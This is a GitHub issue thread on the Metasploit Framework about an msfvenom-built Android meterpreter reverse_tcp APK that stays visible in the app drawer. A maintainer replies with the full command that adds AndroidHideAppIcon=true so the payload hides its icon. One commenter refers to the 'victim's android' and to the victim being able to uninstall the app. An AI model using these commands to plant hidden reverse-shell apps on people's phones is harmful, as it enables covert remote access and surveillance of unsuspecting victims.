### ISSUE TITLE
MSF Venom not hidding MainActivity apk from the app drawer

### ISSUE THREAD

**Issue by raaafaaaaaaa** [rapid7/metasploit-framework#7616]
## Steps to reproduce

How'd you do it?

1. msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > /root/Desktop/myapp.apk
2. Then I put it on my android device and install it
3.It doesn't hide form app drawer

## Expected behavior

What should happen?

MainActivity App doesn't hide in the app drawer 

What happens instead?

Instead it appears there forever, even if i reboot the phone

### Metasploit version

Get this with the `4.13.0` command in msfconsole.

### OS

What OS are you running Metasploit on?

Kali Linux/Parrot OS

**Comment by timwr** [comment]
You can use the hide_app_icon command that was added here:
https://github.com/rapid7/metasploit-framework/pull/7456

**Comment by raaafaaaaaaa** [comment]
How do i make it automatically hideable since the creation of the MainActivity.apk, without having to open a meterpreter session??

**Comment by WhiteHat9754** [comment]
I used command hide_app_icon it says successfull but not hide on victim's android
And victim can easily uninstall that app

**Comment by timwr** [comment]
Try:
msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx AndroidHideAppIcon=true R -o /root/Desktop/myapp.apk

**Comment by WhiteHat9754** [comment]
Bro very thanks

But can you give me your email I want to confirm some issue but don't worry I never disturbed you

**Comment by timwr** [comment]
I'm happy to discuss the issues here or you can find me on slack.

**Comment by WhiteHat9754** [comment]
I don't know how to use slack

**Comment by bcoles** [comment]
@WhiteHat9754 https://metasploit.slack.com/

**Comment by WhiteHat9754** [comment]
Please invite me on your workplace please
